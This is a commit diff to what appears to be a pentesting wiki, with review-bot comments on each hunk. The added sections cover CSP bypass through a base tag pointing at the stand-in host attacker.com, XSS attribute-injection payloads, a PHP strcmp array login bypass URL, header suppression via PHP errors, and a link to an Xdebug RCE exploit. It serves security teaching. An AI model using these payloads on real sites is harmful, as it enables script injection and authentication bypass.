GitBook: [#3070] No subject

This commit is contained in:
CPol 2022-03-21 17:05:35 +00:00 committed by gitbook-bot
parent a7086a6c4a
commit 5346a4c5e6
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
8 changed files with 31 additions and 16 deletions

Binary files changed (images, not shown):
After: 1.7 MiB
Before: 1.7 MiB, After: 34 KiB
Before: 34 KiB, After: 111 KiB

View file

@ -194,6 +194,17 @@ Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md) [iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %} {% endcontent-ref %}
### missing **base-uri**
If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](dangling-markup-html-scriptless-injection.md).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
****If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
```html
<base href="https://www.attacker.com/">
```
### AngularJS events ### AngularJS events
Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this: Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this:
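Review bot: the new "missing base-uri" subsection describes the abuse but never states the fix; add one sentence saying the policy should carry `base-uri 'self'` (or `'none'`), because a script-src nonce does not help once a relative script path such as `/js/app.js` can be retargeted through an injected `<base href>`. Two wording fixes in the same lines: "achieving a XSS" should be "achieving an XSS", and "make use a httpS url in the base" should read "make sure to use an HTTPS URL in the base tag" (a plain-http base on an HTTPS page is blocked as mixed content, which is the reason for the remark).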

View file

@ -202,8 +202,9 @@ If you just think that **it's impossible to create an HTML tag with an attribute
If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\ If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_): If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
```javascript ```bash
" autofocus onfocus=alert(document.domain) x=" " autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
``` ```
#### Style events #### Style events
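Review bot: changing the fence language from `javascript` to `bash` is not right either: both lines are HTML attribute-injection payloads, so `html` is the accurate tag and gives sensible highlighting for the `onfocus=` attributes. The trailing comment on the second payload, `#Access http://site.com/?#x t`, looks truncated after the `t`; either complete it or drop the stray character. Also "double quotes are use to escape" should be "are used to escape", and "in inside a HTML tag" should be "inside an HTML tag".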

View file

@ -55,7 +55,7 @@ var_dump(in_array(0, $values, true));
//False //False
``` ```
### **strcmp()/**strcasecmp() ### strcmp()/strcasecmp()
If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check: If this function is used for **any authentication check** (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password (`https://example.com/login.php/?username=admin&password[]=`) and bypass this check:
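Review bot: the heading clean-up is fine, but the strcmp() paragraph in this hunk would be more useful with the defensive counterpart stated: reject non-string input (an `is_string()` check) before the comparison, since the whole bypass rests on an array arriving where a string was expected. Two small text issues in the same line: the example URL `login.php/?username=` has a stray `/` before the `?`, and "he can send" should be "the user can send".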
@ -133,17 +133,13 @@ $obfs += ""; //int 7
## More tricks ## More tricks
**register\_globals**: En PHP < 4.1.1 o si se ha configurado mal puede ser que las register\_globals estén activas (o se esté imitando su comportamiento). Esto implica que en variables globales como $\_GET si estas poseen un valor por ejemplo $\_GET\["param"]="1234", puedes acceder a este mediante $param. Por lo tanto, enviando parámetros de Get o Post se pueden sobreescribir variables que se usan dentro del código. * **register\_globals**: In **PHP < 4.1.1.1** or if misconfigured, **register\_globals** may be active (or their behavior is being mimicked). This implies that in global variables like $\_GET if they have a value e.g. $\_GET\["param"]="1234", you can access it via **$param. Therefore, by sending HTTP parameters you can overwrite variables** that are used within the code.&#x20;
* The **PHPSESSION cookies of the same domain are stored in the same place**, therefore if within a domain **different cookies are used in different paths** you can make that a path **accesses the cookie of the path** setting the value of the other path cookie.\
This way if **both paths access a variable with the same name** you can make the **value of that variable in path1 apply to path2**. And then path2 will take as valid the variables of path1 (by giving the cookie the name that corresponds to it in path2).
* When you have the **usernames** of the users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
* [**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)
Las **variables de sesión** (asociadas al **PHPSESSION**) de un dominio se guardan en el mismo sitio, por lo tanto si dentro de un dominio se usan distintas cookies en distintos paths se puede hacer que un path acceda a la cookie del otro accediendo a dicho path con la cookie del otro. De esta forma si los dos paths acceden a una variable con el mismo nombre puedes hacer que el valor de dicha variable en el path1 se aplique al path2. Y entonces el path2 tomará como válidas las variables del path1 (al ponerle a la cookie el nombre que le corresponde en el path2). ### password\_hash/password\_verify
Dos usuarios generados a la vez pueden tener la misma cookie (si la cookie depende del tiempo).
When you have the **usernames** of teh users of the machine. Check the address: **/\~\<USERNAME>** to see if the php directories are activated.
****[**LFI and RCE using php wrappers**](../../../pentesting-web/file-inclusion/)****
### **password\_hash/**password\_verify
This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\ This functions are typically used in PHP to **generate hashes from passwords** and to to **check** if a password is correct compared with a hash.\
The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used: The supported algorithms are: `PASSWORD_DEFAULT` and `PASSWORD_BCRYPT` (starts with `$2y$`). Note that **PASSWORD\_DEFAULT is frequently the same as PASSWORD\_BCRYPT.** And currently, **PASSWORD\_BCRYPT** has a **size limitation in the input of 72bytes**. Therefore, when you try to hash something larger than 72bytes with this algorithm only the first 72B will be used:
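Review bot: the translation introduces a version typo: the removed Spanish line says `PHP < 4.1.1`, the English replacement says `PHP < 4.1.1.1`; keep `4.1.1`. The removed sentence "Dos usuarios generados a la vez pueden tener la misma cookie (si la cookie depende del tiempo)" has no English counterpart among the new bullets; either restore it ("Two users created at the same time may receive the same cookie if the cookie value depends on the time") or drop it deliberately. The new bullets should also say "PHP directories" rather than "php directories" to match the rest of the section.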
@ -156,6 +152,13 @@ $cont=72; echo password_verify(str_repeat("a",$cont), password_hash(str_repeat("
True True
``` ```
### HTTP headers bypass abusing PHP errors
If a **PHP page is printing errors and echoing back some input provided by the user**, the user can make the PHP server print back some **content long enough** so when it tries to **add the headers** into the response the server will throw and error.\
In the following scenario the **attacker made the server throw some big errors**, and as you can see in the screen when php tried to **modify the header information, it couldn't** (so for example the CSP header wasn't sent to the user):
![](<../../../.gitbook/assets/image (465).png>)
## Code execution ## Code execution
**system("ls");**\ **system("ls");**\
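Review bot: the new "HTTP headers bypass abusing PHP errors" section should state the mechanism in one sentence so the reader knows what to look for: once PHP has started sending the response body (verbose error output counts), a later `header()` call fails with the "Cannot modify header information - headers already sent" warning, which is why the CSP header in the screenshot never reached the client. The defensive counterpart belongs beside it: `display_errors=Off` in production, and either output buffering (so headers go out only after the script finishes) or security headers set at the web-server layer so application output cannot suppress them. Typo: "throw and error" should be "throw an error".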
@ -270,7 +273,7 @@ echo "$x ${Da}"; //Da Drums
## Xdebug unauthenticated RCE ## Xdebug unauthenticated RCE
If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)&#x20; If you see that **Xdebug** is **enabled** in a `phpconfig()` output you should try to get RCE via [https://github.com/nqxcode/xdebug-exploit](https://github.com/nqxcode/xdebug-exploit)
## Execute PHP without letters ## Execute PHP without letters
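Review bot: this hunk only strips a trailing `&#x20;`, but the sentence it touches refers to `phpconfig()`, which is not a PHP function; the configuration dump that shows whether Xdebug is loaded is `phpinfo()`. Worth correcting while the line is already being edited.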

View file

@ -55,7 +55,7 @@ To connect with the bus pirate you can follow the docs:
In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27: In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
![](<../../.gitbook/assets/image (465) (2).png>) ![](<../../.gitbook/assets/image (465) (2) (1).png>)
To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\ To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication): In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
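Review bot: only the image reference changes here, but the context has two points worth fixing in the same pass: the 24C256 is an I2C serial EEPROM, not an EPROM (the next sentence is about talking I2C to it, so the distinction matters), and "pirate bus COM port" should be "Bus Pirate COM port".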

View file

@ -14,7 +14,7 @@ In settings (the second tab button) you can select the **SDR device** or **selec
In the GUI behaviour it's recommended to enable a few things if your PC support it: In the GUI behaviour it's recommended to enable a few things if your PC support it:
![](<../../.gitbook/assets/image (465).png>) ![](<../../.gitbook/assets/image (465) (2).png>)
{% hint style="info" %} {% hint style="info" %}
If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate. If you realise that your PC is not capturing things try to disable OpenGL and lowering the sample rate.
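Review bot: only the image path changes, but the hint text in the context reads "try to disable OpenGL and lowering the sample rate"; it should be "try disabling OpenGL and lowering the sample rate". In the line above, "if your PC support it" should be "if your PC supports it".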